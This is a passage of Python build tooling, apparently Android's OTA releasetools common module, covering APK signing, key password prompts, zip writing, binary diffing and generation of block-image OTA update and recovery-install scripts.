% (version, codename_to_api_level_map))
def SignFile(input_name, output_name, key, password, min_api_level=None,
codename_to_api_level_map=dict(),
whole_file=False):
"""Sign the input_name zip/jar/apk, producing output_name. Use the
given key and password (the latter may be None if the key does not
  have a password).
If whole_file is true, use the "-w" option to SignApk to embed a
signature that covers the whole file in the archive comment of the
zip file.
min_api_level is the API Level (int) of the oldest platform this file may end
up on. If not specified for an APK, the API Level is obtained by interpreting
the minSdkVersion attribute of the APK's AndroidManifest.xml.
codename_to_api_level_map is needed to translate the codename which may be
encountered as the APK's minSdkVersion.
"""
java_library_path = os.path.join(
OPTIONS.search_path, OPTIONS.signapk_shared_library_path)
  cmd = ([OPTIONS.java_path] + OPTIONS.java_args +
         ["-Djava.library.path=" + java_library_path, "-jar",
          os.path.join(OPTIONS.search_path, OPTIONS.signapk_path)])
cmd.extend(OPTIONS.extra_signapk_args)
if whole_file:
cmd.append("-w")
min_sdk_version = min_api_level
if min_sdk_version is None:
if not whole_file:
min_sdk_version = GetMinSdkVersionInt(
input_name, codename_to_api_level_map)
if min_sdk_version is not None:
cmd.extend(["--min-sdk-version", str(min_sdk_version)])
cmd.extend([key + OPTIONS.public_key_suffix,
key + OPTIONS.private_key_suffix,
input_name, output_name])
p = Run(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if password is not None:
password += "\n"
p.communicate(password)
if p.returncode != 0:
raise ExternalError("signapk.jar failed: return code %s" % (p.returncode,))
def CheckSize(data, target, info_dict):
"""Check the data string passed against the max size limit, if
any, for the given target. Raise exception if the data is too big.
Print a warning if the data is nearing the maximum size."""
if target.endswith(".img"):
target = target[:-4]
mount_point = "/" + target
fs_type = None
limit = None
if info_dict["fstab"]:
if mount_point == "/userdata":
mount_point = "/data"
p = info_dict["fstab"][mount_point]
fs_type = p.fs_type
device = p.device
if "/" in device:
device = device[device.rfind("/")+1:]
limit = info_dict.get(device + "_size", None)
if not fs_type or not limit:
return
if fs_type == "yaffs2":
# image size should be increased by 1/64th to account for the
# spare area (64 bytes per 2k page)
limit = limit / 2048 * (2048+64)
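    # Hedged worked example: a 64 MiB limit becomes
    # 67108864 / 2048 * 2112 = 69206016 bytes once the spare area is counted.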
size = len(data)
pct = float(size) * 100.0 / limit
msg = "%s size (%d) is %.2f%% of limit (%d)" % (target, size, pct, limit)
if pct >= 99.0:
raise ExternalError(msg)
elif pct >= 95.0:
print("\n WARNING: %s\n" % (msg,))
elif OPTIONS.verbose:
print(" ", msg)
def ReadApkCerts(tf_zip):
"""Given a target_files ZipFile, parse the META/apkcerts.txt file
and return a {package: cert} dict."""
certmap = {}
for line in tf_zip.read("META/apkcerts.txt").split("\n"):
line = line.strip()
if not line:
continue
m = re.match(r'^name="(.*)"\s+certificate="(.*)"\s+'
r'private_key="(.*)"$', line)
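    # Hedged example of a line this regex accepts (illustrative values):
    #   name="Example.apk" certificate="certs/example.x509.pem" private_key="certs/example.pk8"
    # which ends up mapping 'Example.apk' -> 'certs/example' below.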
if m:
name, cert, privkey = m.groups()
public_key_suffix_len = len(OPTIONS.public_key_suffix)
private_key_suffix_len = len(OPTIONS.private_key_suffix)
if cert in SPECIAL_CERT_STRINGS and not privkey:
certmap[name] = cert
elif (cert.endswith(OPTIONS.public_key_suffix) and
privkey.endswith(OPTIONS.private_key_suffix) and
cert[:-public_key_suffix_len] == privkey[:-private_key_suffix_len]):
certmap[name] = cert[:-public_key_suffix_len]
else:
raise ValueError("failed to parse line from apkcerts.txt:\n" + line)
return certmap
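# Expected META/apkcerts.txt line format (illustrative entry; the certificate
# paths are hypothetical):
#
#   name="Example.apk" certificate="build/target/product/security/platform.x509.pem" private_key="build/target/product/security/platform.pk8"
#
# which, with the default key suffixes, yields
#   {"Example.apk": "build/target/product/security/platform"}
# after the public/private key suffixes are stripped and checked for a match.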
COMMON_DOCSTRING = """
-p (--path) <dir>
Prepend <dir>/bin to the list of places to search for binaries
run by this script, and expect to find jars in <dir>/framework.
-s (--device_specific) <file>
Path to the python module containing device-specific
releasetools code.
-x (--extra) <key=value>
Add a key/value pair to the 'extras' dict, which device-specific
extension code may look at.
-v (--verbose)
Show command lines being executed.
-h (--help)
Display this usage message and exit.
"""
def Usage(docstring):
print(docstring.rstrip("\n"))
print(COMMON_DOCSTRING)
def ParseOptions(argv,
docstring,
extra_opts="", extra_long_opts=(),
extra_option_handler=None):
"""Parse the options in argv and return any arguments that aren't
flags. docstring is the calling module's docstring, to be displayed
for errors and -h. extra_opts and extra_long_opts are for flags
defined by the caller, which are processed by passing them to
extra_option_handler."""
try:
opts, args = getopt.getopt(
argv, "hvp:s:x:" + extra_opts,
["help", "verbose", "path=", "signapk_path=",
"signapk_shared_library_path=", "extra_signapk_args=",
"java_path=", "java_args=", "public_key_suffix=",
"private_key_suffix=", "boot_signer_path=", "boot_signer_args=",
"verity_signer_path=", "verity_signer_args=", "device_specific=",
"extra="] +
list(extra_long_opts))
except getopt.GetoptError as err:
Usage(docstring)
print("**", str(err), "**")
sys.exit(2)
for o, a in opts:
if o in ("-h", "--help"):
Usage(docstring)
sys.exit()
elif o in ("-v", "--verbose"):
OPTIONS.verbose = True
elif o in ("-p", "--path"):
OPTIONS.search_path = a
elif o in ("--signapk_path",):
OPTIONS.signapk_path = a
elif o in ("--signapk_shared_library_path",):
OPTIONS.signapk_shared_library_path = a
elif o in ("--extra_signapk_args",):
OPTIONS.extra_signapk_args = shlex.split(a)
elif o in ("--java_path",):
OPTIONS.java_path = a
elif o in ("--java_args",):
OPTIONS.java_args = shlex.split(a)
elif o in ("--public_key_suffix",):
OPTIONS.public_key_suffix = a
elif o in ("--private_key_suffix",):
OPTIONS.private_key_suffix = a
elif o in ("--boot_signer_path",):
OPTIONS.boot_signer_path = a
elif o in ("--boot_signer_args",):
OPTIONS.boot_signer_args = shlex.split(a)
elif o in ("--verity_signer_path",):
OPTIONS.verity_signer_path = a
elif o in ("--verity_signer_args",):
OPTIONS.verity_signer_args = shlex.split(a)
elif o in ("-s", "--device_specific"):
OPTIONS.device_specific = a
elif o in ("-x", "--extra"):
key, value = a.split("=", 1)
OPTIONS.extras[key] = value
else:
if extra_option_handler is None or not extra_option_handler(o, a):
assert False, "unknown option \"%s\"" % (o,)
if OPTIONS.search_path:
os.environ["PATH"] = (os.path.join(OPTIONS.search_path, "bin") +
os.pathsep + os.environ["PATH"])
return args
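# Illustrative caller pattern (sketch; "--foo" and option_handler are
# hypothetical names, not part of this module):
#
#   def option_handler(o, a):
#     if o == "--foo":
#       OPTIONS.extras["foo"] = a
#       return True
#     return False
#
#   args = ParseOptions(sys.argv[1:], __doc__,
#                       extra_long_opts=["foo="],
#                       extra_option_handler=option_handler)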
def MakeTempFile(prefix=None, suffix=None):
"""Make a temp file and add it to the list of things to be deleted
when Cleanup() is called. Return the filename."""
fd, fn = tempfile.mkstemp(prefix=prefix, suffix=suffix)
os.close(fd)
OPTIONS.tempfiles.append(fn)
return fn
def Cleanup():
for i in OPTIONS.tempfiles:
if os.path.isdir(i):
shutil.rmtree(i)
else:
os.remove(i)
class PasswordManager(object):
def __init__(self):
self.editor = os.getenv("EDITOR", None)
self.pwfile = os.getenv("ANDROID_PW_FILE", None)
def GetPasswords(self, items):
"""Get passwords corresponding to each string in 'items',
returning a dict. (The dict may have keys in addition to the
values in 'items'.)
Uses the passwords in $ANDROID_PW_FILE if available, letting the
user edit that file to add more needed passwords. If no editor is
    available, or $ANDROID_PW_FILE isn't defined, prompts the user
interactively in the ordinary way.
"""
current = self.ReadFile()
first = True
while True:
missing = []
for i in items:
if i not in current or not current[i]:
missing.append(i)
# Are all the passwords already in the file?
if not missing:
return current
for i in missing:
current[i] = ""
if not first:
print("key file %s still missing some passwords." % (self.pwfile,))
answer = raw_input("try to edit again? [y]> ").strip()
if answer and answer[0] not in 'yY':
raise RuntimeError("key passwords unavailable")
first = False
current = self.UpdateAndReadFile(current)
def PromptResult(self, current): # pylint: disable=no-self-use
"""Prompt the user to enter a value (password) for each key in
    'current' whose value is false. Returns a new dict with all the
values.
"""
result = {}
for k, v in sorted(current.iteritems()):
if v:
result[k] = v
else:
while True:
result[k] = getpass.getpass(
"Enter password for %s key> " % k).strip()
if result[k]:
break
return result
def UpdateAndReadFile(self, current):
if not self.editor or not self.pwfile:
return self.PromptResult(current)
f = open(self.pwfile, "w")
os.chmod(self.pwfile, 0o600)
f.write("# Enter key passwords between the [[[ ]]] brackets.\n")
f.write("# (Additional spaces are harmless.)\n\n")
first_line = None
sorted_list = sorted([(not v, k, v) for (k, v) in current.iteritems()])
for i, (_, k, v) in enumerate(sorted_list):
f.write("[[[ %s ]]] %s\n" % (v, k))
if not v and first_line is None:
# position cursor on first line with no password.
first_line = i + 4
f.close()
p = Run([self.editor, "+%d" % (first_line,), self.pwfile])
_, _ = p.communicate()
return self.ReadFile()
def ReadFile(self):
result = {}
if self.pwfile is None:
return result
try:
f = open(self.pwfile, "r")
for line in f:
line = line.strip()
if not line or line[0] == '#':
continue
m = re.match(r"^\[\[\[\s*(.*?)\s*\]\]\]\s*(\S+)$", line)
if not m:
print("failed to parse password file: ", line)
else:
result[m.group(2)] = m.group(1)
f.close()
except IOError as e:
if e.errno != errno.ENOENT:
print("error reading password file: ", str(e))
return result
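# Password file format parsed by ReadFile() (illustrative contents of
# $ANDROID_PW_FILE; the key names are hypothetical):
#
#   # Enter key passwords between the [[[ ]]] brackets.
#   [[[ secret1 ]]] build/target/product/security/releasekey
#   [[[         ]]] build/target/product/security/platform
#
# An entry with an empty password is treated as still missing, so
# GetPasswords() will prompt for it again.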
def ZipWrite(zip_file, filename, arcname=None, perms=0o644,
compress_type=None):
import datetime
# http://b/18015246
# Python 2.7's zipfile implementation wrongly thinks that zip64 is required
# for files larger than 2GiB. We can work around this by adjusting their
# limit. Note that `zipfile.writestr()` will not work for strings larger than
# 2GiB. The Python interpreter sometimes rejects strings that large (though
# it isn't clear to me exactly what circumstances cause this).
# `zipfile.write()` must be used directly to work around this.
#
# This mess can be avoided if we port to python3.
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
if compress_type is None:
compress_type = zip_file.compression
if arcname is None:
arcname = filename
saved_stat = os.stat(filename)
try:
# `zipfile.write()` doesn't allow us to pass ZipInfo, so just modify the
# file to be zipped and reset it when we're done.
os.chmod(filename, perms)
# Use a fixed timestamp so the output is repeatable.
epoch = datetime.datetime.fromtimestamp(0)
timestamp = (datetime.datetime(2009, 1, 1) - epoch).total_seconds()
os.utime(filename, (timestamp, timestamp))
zip_file.write(filename, arcname=arcname, compress_type=compress_type)
finally:
os.chmod(filename, saved_stat.st_mode)
os.utime(filename, (saved_stat.st_atime, saved_stat.st_mtime))
zipfile.ZIP64_LIMIT = saved_zip64_limit
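# Illustrative usage (file names are hypothetical): stage a file into an
# output zip with fixed permissions and the fixed 2009-01-01 timestamp so the
# resulting archive is byte-for-byte reproducible.
#
#   out_zip = zipfile.ZipFile("target.zip", "w", zipfile.ZIP_DEFLATED)
#   ZipWrite(out_zip, "path/on/disk/boot.img", arcname="boot.img", perms=0o644)
#   ZipClose(out_zip)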
def ZipWriteStr(zip_file, zinfo_or_arcname, data, perms=None,
compress_type=None):
"""Wrap zipfile.writestr() function to work around the zip64 limit.
Even with the ZIP64_LIMIT workaround, it won't allow writing a string
longer than 2GiB. It gives 'OverflowError: size does not fit in an int'
when calling crc32(bytes).
But it still works fine to write a shorter string into a large zip file.
We should use ZipWrite() whenever possible, and only use ZipWriteStr()
when we know the string won't be too long.
"""
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
if not isinstance(zinfo_or_arcname, zipfile.ZipInfo):
zinfo = zipfile.ZipInfo(filename=zinfo_or_arcname)
zinfo.compress_type = zip_file.compression
if perms is None:
perms = 0o100644
else:
zinfo = zinfo_or_arcname
# If compress_type is given, it overrides the value in zinfo.
if compress_type is not None:
zinfo.compress_type = compress_type
# If perms is given, it has a priority.
if perms is not None:
# If perms doesn't set the file type, mark it as a regular file.
if perms & 0o770000 == 0:
perms |= 0o100000
zinfo.external_attr = perms << 16
# Use a fixed timestamp so the output is repeatable.
zinfo.date_time = (2009, 1, 1, 0, 0, 0)
zip_file.writestr(zinfo, data)
zipfile.ZIP64_LIMIT = saved_zip64_limit
def ZipClose(zip_file):
# http://b/18015246
# zipfile also refers to ZIP64_LIMIT during close() when it writes out the
# central directory.
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
zip_file.close()
zipfile.ZIP64_LIMIT = saved_zip64_limit
class DeviceSpecificParams(object):
module = None
def __init__(self, **kwargs):
"""Keyword arguments to the constructor become attributes of this
object, which is passed to all functions in the device-specific
module."""
for k, v in kwargs.iteritems():
setattr(self, k, v)
self.extras = OPTIONS.extras
if self.module is None:
path = OPTIONS.device_specific
if not path:
return
try:
if os.path.isdir(path):
info = imp.find_module("releasetools", [path])
else:
d, f = os.path.split(path)
b, x = os.path.splitext(f)
if x == ".py":
f = b
info = imp.find_module(f, [d])
print("loaded device-specific extensions from", path)
self.module = imp.load_module("device_specific", *info)
except ImportError:
print("unable to load device-specific module; assuming none")
def _DoCall(self, function_name, *args, **kwargs):
"""Call the named function in the device-specific module, passing
the given args and kwargs. The first argument to the call will be
the DeviceSpecific object itself. If there is no module, or the
module does not define the function, return the value of the
'default' kwarg (which itself defaults to None)."""
if self.module is None or not hasattr(self.module, function_name):
return kwargs.get("default", None)
return getattr(self.module, function_name)(*((self,) + args), **kwargs)
def FullOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of a
full OTA package. Implementations can add whatever additional
assertions they like."""
return self._DoCall("FullOTA_Assertions")
def FullOTA_InstallBegin(self):
"""Called at the start of full OTA installation."""
return self._DoCall("FullOTA_InstallBegin")
def FullOTA_InstallEnd(self):
"""Called at the end of full OTA installation; typically this is
used to install the image for the device's baseband processor."""
return self._DoCall("FullOTA_InstallEnd")
def IncrementalOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of an
incremental OTA package. Implementations can add whatever
additional assertions they like."""
return self._DoCall("IncrementalOTA_Assertions")
def IncrementalOTA_VerifyBegin(self):
"""Called at the start of the verification phase of incremental
OTA installation; additional checks can be placed here to abort
the script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyBegin")
def IncrementalOTA_VerifyEnd(self):
"""Called at the end of the verification phase of incremental OTA
installation; additional checks can be placed here to abort the
script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyEnd")
def IncrementalOTA_InstallBegin(self):
"""Called at the start of incremental OTA installation (after
verification is complete)."""
return self._DoCall("IncrementalOTA_InstallBegin")
def IncrementalOTA_InstallEnd(self):
"""Called at the end of incremental OTA installation; typically
this is used to install the image for the device's baseband
processor."""
return self._DoCall("IncrementalOTA_InstallEnd")
def VerifyOTA_Assertions(self):
return self._DoCall("VerifyOTA_Assertions")
class File(object):
def __init__(self, name, data):
self.name = name
self.data = data
self.size = len(data)
self.sha1 = sha1(data).hexdigest()
@classmethod
def FromLocalFile(cls, name, diskname):
f = open(diskname, "rb")
data = f.read()
f.close()
return File(name, data)
def WriteToTemp(self):
t = tempfile.NamedTemporaryFile()
t.write(self.data)
t.flush()
return t
def AddToZip(self, z, compression=None):
ZipWriteStr(z, self.name, self.data, compress_type=compression)
DIFF_PROGRAM_BY_EXT = {
".gz" : "imgdiff",
".zip" : ["imgdiff", "-z"],
".jar" : ["imgdiff", "-z"],
".apk" : ["imgdiff", "-z"],
".img" : "imgdiff",
}
class Difference(object):
def __init__(self, tf, sf, diff_program=None):
self.tf = tf
self.sf = sf
self.patch = None
self.diff_program = diff_program
def ComputePatch(self):
"""Compute the patch (as a string of data) needed to turn sf into
tf. Returns the same tuple as GetPatch()."""
tf = self.tf
sf = self.sf
if self.diff_program:
diff_program = self.diff_program
else:
ext = os.path.splitext(tf.name)[1]
diff_program = DIFF_PROGRAM_BY_EXT.get(ext, "bsdiff")
ttemp = tf.WriteToTemp()
stemp = sf.WriteToTemp()
ext = os.path.splitext(tf.name)[1]
try:
ptemp = tempfile.NamedTemporaryFile()
if isinstance(diff_program, list):
cmd = copy.copy(diff_program)
else:
cmd = [diff_program]
cmd.append(stemp.name)
cmd.append(ttemp.name)
cmd.append(ptemp.name)
p = Run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
err = []
def run():
_, e = p.communicate()
if e:
err.append(e)
th = threading.Thread(target=run)
th.start()
th.join(timeout=300) # 5 mins
if th.is_alive():
print("WARNING: diff command timed out")
p.terminate()
th.join(5)
if th.is_alive():
p.kill()
th.join()
if err or p.returncode != 0:
print("WARNING: failure running %s:\n%s\n" % (
diff_program, "".join(err)))
self.patch = None
return None, None, None
diff = ptemp.read()
finally:
ptemp.close()
stemp.close()
ttemp.close()
self.patch = diff
return self.tf, self.sf, self.patch
def GetPatch(self):
"""Return a tuple (target_file, source_file, patch_data).
patch_data may be None if ComputePatch hasn't been called, or if
computing the patch failed."""
return self.tf, self.sf, self.patch
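# Illustrative flow (sketch; the file names are hypothetical): build two File
# objects, compute a patch, and read back the (target, source, patch) tuple.
#
#   tf = File.FromLocalFile("system/app/Foo.apk", "new/Foo.apk")
#   sf = File.FromLocalFile("system/app/Foo.apk", "old/Foo.apk")
#   d = Difference(tf, sf)
#   d.ComputePatch()
#   target, source, patch = d.GetPatch()   # patch is None if diffing failed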
def ComputeDifferences(diffs):
"""Call ComputePatch on all the Difference objects in 'diffs'."""
print(len(diffs), "diffs to compute")
# Do the largest files first, to try and reduce the long-pole effect.
by_size = [(i.tf.size, i) for i in diffs]
by_size.sort(reverse=True)
by_size = [i[1] for i in by_size]
lock = threading.Lock()
diff_iter = iter(by_size) # accessed under lock
def worker():
try:
lock.acquire()
for d in diff_iter:
lock.release()
start = time.time()
d.ComputePatch()
dur = time.time() - start
lock.acquire()
tf, sf, patch = d.GetPatch()
if sf.name == tf.name:
name = tf.name
else:
name = "%s (%s)" % (tf.name, sf.name)
if patch is None:
print("patching failed! %s" % (name,))
else:
print("%8.2f sec %8d / %8d bytes (%6.2f%%) %s" % (
dur, len(patch), tf.size, 100.0 * len(patch) / tf.size, name))
lock.release()
except Exception as e:
print(e)
raise
# start worker threads; wait for them all to finish.
threads = [threading.Thread(target=worker)
for i in range(OPTIONS.worker_threads)]
for th in threads:
th.start()
while threads:
threads.pop().join()
class BlockDifference(object):
def __init__(self, partition, tgt, src=None, check_first_block=False,
version=None, disable_imgdiff=False):
self.tgt = tgt
self.src = src
self.partition = partition
self.check_first_block = check_first_block
self.disable_imgdiff = disable_imgdiff
if version is None:
version = 1
if OPTIONS.info_dict:
version = max(
int(i) for i in
OPTIONS.info_dict.get("blockimgdiff_versions", "1").split(","))
self.version = version
b = blockimgdiff.BlockImageDiff(tgt, src, threads=OPTIONS.worker_threads,
version=self.version,
disable_imgdiff=self.disable_imgdiff)
tmpdir = tempfile.mkdtemp()
OPTIONS.tempfiles.append(tmpdir)
self.path = os.path.join(tmpdir, partition)
b.Compute(self.path)
self._required_cache = b.max_stashed_size
self.touched_src_ranges = b.touched_src_ranges
self.touched_src_sha1 = b.touched_src_sha1
@property
def required_cache(self):
return self._required_cache
def WriteScript(self, script, output_zip, progress=None):
if not self.src:
# write the output unconditionally
script.Print("Patching %s image unconditionally..." % (self.partition,))
else:
script.Print("Patching %s image after verification." % (self.partition,))
if progress:
script.ShowProgress(progress, 0)
self._WriteUpdate(script, output_zip)
if OPTIONS.verify:
self._WritePostInstallVerifyScript(script)
def WriteStrictVerifyScript(self, script):
"""Verify all the blocks in the care_map, including clobbered blocks.
This differs from the WriteVerifyScript() function: a) it prints different
error messages; b) it doesn't allow half-way updated images to pass the
verification."""
partition = self.partition
script.Print("Verifying %s..." % (partition,))
ranges = self.tgt.care_map
ranges_str = ranges.to_string_raw()
script.AppendExtra('range_sha1("%s", "%s") == "%s" && '
'ui_print(" Verified.") || '
'ui_print("\\"%s\\" has unexpected contents.");' % (
self.device, ranges_str,
self.tgt.TotalSha1(include_clobbered_blocks=True),
self.device))
script.AppendExtra("")
def WriteVerifyScript(self, script, touched_blocks_only=False):
partition = self.partition
# full OTA
if not self.src:
script.Print("Image %s will be patched unconditionally." % (partition,))
# incremental OTA
else:
if touched_blocks_only and self.version >= 3:
ranges = self.touched_src_ranges
expected_sha1 = self.touched_src_sha1
else:
ranges = self.src.care_map.subtract(self.src.clobbered_blocks)
expected_sha1 = self.src.TotalSha1()
# No blocks to be checked, skipping.
if not ranges:
return
ranges_str = ranges.to_string_raw()
if self.version >= 4:
script.AppendExtra(('if (range_sha1("%s", "%s") == "%s" || '
'block_image_verify("%s", '
'package_extract_file("%s.transfer.list"), '
'"%s.new.dat", "%s.patch.dat")) then') % (
self.device, ranges_str, expected_sha1,
self.device, partition, partition, partition))
elif self.version == 3:
script.AppendExtra(('if (range_sha1("%s", "%s") == "%s" || '
'block_image_verify("%s", '
'package_extract_file("%s.transfer.list"), '
'"%s.new.dat", "%s.patch.dat")) then') % (
self.device, ranges_str, expected_sha1,
self.device, partition, partition, partition))
else:
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str, self.src.TotalSha1()))
script.Print('Verified %s image...' % (partition,))
script.AppendExtra('else')
if self.version >= 4:
# Bug: 21124327
# When generating incrementals for the system and vendor partitions in
# version 4 or newer, explicitly check the first block (which contains
# the superblock) of the partition to see if it's what we expect. If
# this check fails, give an explicit log message about the partition
# having been remounted R/W (the most likely explanation).
if self.check_first_block:
script.AppendExtra('check_first_block("%s");' % (self.device,))
# If version >= 4, try block recovery before abort update
if partition == "system":
code = ErrorCode.SYSTEM_RECOVER_FAILURE
else:
code = ErrorCode.VENDOR_RECOVER_FAILURE
script.AppendExtra((
'ifelse (block_image_recover("{device}", "{ranges}") && '
'block_image_verify("{device}", '
'package_extract_file("{partition}.transfer.list"), '
'"{partition}.new.dat", "{partition}.patch.dat"), '
'ui_print("{partition} recovered successfully."), '
'abort("E{code}: {partition} partition fails to recover"));\n'
'endif;').format(device=self.device, ranges=ranges_str,
partition=partition, code=code))
# Abort the OTA update. Note that the incremental OTA cannot be applied
# even if it may match the checksum of the target partition.
# a) If version < 3, operations like move and erase will make changes
# unconditionally and damage the partition.
# b) If version >= 3, it won't even reach here.
else:
if partition == "system":
code = ErrorCode.SYSTEM_VERIFICATION_FAILURE
else:
code = ErrorCode.VENDOR_VERIFICATION_FAILURE
script.AppendExtra((
'abort("E%d: %s partition has unexpected contents");\n'
'endif;') % (code, partition))
def _WritePostInstallVerifyScript(self, script):
partition = self.partition
script.Print('Verifying the updated %s image...' % (partition,))
# Unlike pre-install verification, clobbered_blocks should not be ignored.
ranges = self.tgt.care_map
ranges_str = ranges.to_string_raw()
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str,
self.tgt.TotalSha1(include_clobbered_blocks=True)))
# Bug: 20881595
# Verify that extended blocks are really zeroed out.
if self.tgt.extended:
ranges_str = self.tgt.extended.to_string_raw()
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str,
self._HashZeroBlocks(self.tgt.extended.size())))
script.Print('Verified the updated %s image.' % (partition,))
if partition == "system":
code = ErrorCode.SYSTEM_NONZERO_CONTENTS
else:
code = ErrorCode.VENDOR_NONZERO_CONTENTS
script.AppendExtra(
'else\n'
' abort("E%d: %s partition has unexpected non-zero contents after '
'OTA update");\n'
'endif;' % (code, partition))
else:
script.Print('Verified the updated %s image.' % (partition,))
if partition == "system":
code = ErrorCode.SYSTEM_UNEXPECTED_CONTENTS
else:
code = ErrorCode.VENDOR_UNEXPECTED_CONTENTS
script.AppendExtra(
'else\n'
' abort("E%d: %s partition has unexpected contents after OTA '
'update");\n'
'endif;' % (code, partition))
def _WriteUpdate(self, script, output_zip):
ZipWrite(output_zip,
'{}.transfer.list'.format(self.path),
'{}.transfer.list'.format(self.partition))
ZipWrite(output_zip,
'{}.new.dat'.format(self.path),
'{}.new.dat'.format(self.partition))
ZipWrite(output_zip,
'{}.patch.dat'.format(self.path),
'{}.patch.dat'.format(self.partition),
compress_type=zipfile.ZIP_STORED)
if self.partition == "system":
code = ErrorCode.SYSTEM_UPDATE_FAILURE
else:
code = ErrorCode.VENDOR_UPDATE_FAILURE
call = ('block_image_update("{device}", '
'package_extract_file("{partition}.transfer.list"), '
'"{partition}.new.dat", "{partition}.patch.dat") ||\n'
' abort("E{code}: Failed to update {partition} image.");'.format(
device=self.device, partition=self.partition, code=code))
script.AppendExtra(script.WordWrap(call))
def _HashBlocks(self, source, ranges): # pylint: disable=no-self-use
data = source.ReadRangeSet(ranges)
ctx = sha1()
for p in data:
ctx.update(p)
return ctx.hexdigest()
def _HashZeroBlocks(self, num_blocks): # pylint: disable=no-self-use
"""Return the hash value for all zero blocks."""
zero_block = '\x00' * 4096
ctx = sha1()
for _ in range(num_blocks):
ctx.update(zero_block)
return ctx.hexdigest()
DataImage = blockimgdiff.DataImage
# map recovery.fstab's fs_types to mount/format "partition types"
PARTITION_TYPES = {
"yaffs2": "MTD",
"mtd": "MTD",
"ext4": "EMMC",
"emmc": "EMMC",
"f2fs": "EMMC",
"squashfs": "EMMC"
}
def GetTypeAndDevice(mount_point, info):
fstab = info["fstab"]
if fstab:
return (PARTITION_TYPES[fstab[mount_point].fs_type],
fstab[mount_point].device)
else:
raise KeyError
def ParseCertificate(data):
"""Parse a PEM-format certificate."""
cert = []
save = False
for line in data.split("\n"):
if "--END CERTIFICATE--" in line:
break
if save:
cert.append(line)
if "--BEGIN CERTIFICATE--" in line:
save = True
cert = "".join(cert).decode('base64')
return cert
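# ParseCertificate() expects standard PEM input (illustrative):
#
#   -----BEGIN CERTIFICATE-----
#   MIIC...base64 payload...
#   -----END CERTIFICATE-----
#
# and returns the DER bytes obtained by base64-decoding everything between
# the BEGIN/END markers.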
def MakeRecoveryPatch(input_dir, output_sink, recovery_img, boot_img,
info_dict=None):
"""Generate a binary patch that creates the recovery image starting
with the boot image. (Most of the space in these images is just the
kernel, which is identical for the two, so the resulting patch
should be efficient.) Add it to the output zip, along with a shell
script that is run from init.rc on first boot to actually do the
patching and install the new recovery image.
recovery_img and boot_img should be File objects for the
  corresponding images. info_dict should be the dictionary returned by
  common.LoadInfoDict() on the input target_files.
"""
if info_dict is None:
info_dict = OPTIONS.info_dict
full_recovery_image = info_dict.get("full_recovery_image", None) == "true"
system_root_image = info_dict.get("system_root_image", None) == "true"
if full_recovery_image:
output_sink("etc/recovery.img", recovery_img.data)
else:
diff_program = ["imgdiff"]
path = os.path.join(input_dir, "SYSTEM", "etc", "recovery-resource.dat")
if os.path.exists(path):
diff_program.append("-b")
diff_program.append(path)
bonus_args = "-b /system/etc/recovery-resource.dat"
else:
bonus_args = ""
d = Difference(recovery_img, boot_img, diff_program=diff_program)
_, _, patch = d.ComputePatch()
output_sink("recovery-from-boot.p", patch)
try:
# The following GetTypeAndDevice()s need to use the path in the target
# info_dict instead of source_info_dict.
boot_type, boot_device = GetTypeAndDevice("/boot", info_dict)
recovery_type, recovery_device = GetTypeAndDevice("/recovery", info_dict)
except KeyError:
return
if full_recovery_image:
sh = """#!/system/bin/sh
if ! applypatch -c %(type)s:%(device)s:%(size)d:%(sha1)s; then
applypatch /system/etc/recovery.img %(type)s:%(device)s %(sha1)s %(size)d && log -t recovery "Installing new recovery image: succeeded" || log -t recovery "Installing new recovery image: failed"
else
log -t recovery "Recovery image already installed"
fi
""" % {'type': recovery_type,
'device': recovery_device,
'sha1': recovery_img.sha1,
'size': recovery_img.size}
else:
sh = """#!/system/bin/sh
if ! applypatch -c %(recovery_type)s:%(recovery_device)s:%(recovery_size)d:%(recovery_sha1)s; then
applypatch %(bonus_args)s %(boot_type)s:%(boot_device)s:%(boot_size)d:%(boot_sha1)s %(recovery_type)s:%(recovery_device)s %(recovery_sha1)s %(recovery_size)d %(boot_sha1)s:/system/recovery-from-boot.p && log -t recovery "Installing new recovery image: succeeded" || log -t recovery "Installing new recovery image: failed"
else
log -t recovery "Recovery image already installed"
fi
""" % {'boot_size': boot_img.size,
'boot_sha1': boot_img.sha1,
'recovery_size': recovery_img.size,
'recovery_sha1': recovery_img.sha1,
'boot_type': boot_type,
'boot_device': boot_device,
'recovery_type': recovery_type,
'recovery_device': recovery_device,
'bonus_args': bonus_args}
# The install script location moved from /system/etc to /system/bin
# in the L release. Parse init.*.rc files to find out where the
# target-files expects it to be, and put it there.
sh_location = "etc/install-recovery.sh"
found = False
if system_root_image:
init_rc_dir = os.path.join(input_dir, "ROOT")
else:
init_rc_dir = os.path.join(input_dir, "BOOT", "RAMDISK")
init_rc_files = os.listdir(init_rc_dir)
for init_rc_file in init_rc_files:
if (not init_rc_file.startswith('init.') or
not init_rc_file.endswith('.rc')):
continue
with open(os.path.join(init_rc_dir, init_rc_file)) as f:
for line in f:
m = re.match(r"^service flash_recovery /system/(\S+)\s*$", line)
if m:
sh_location = m.group(1)
found = True
break
if found:
break
print("putting script in", sh_location)
output_sink(sh_location, sh)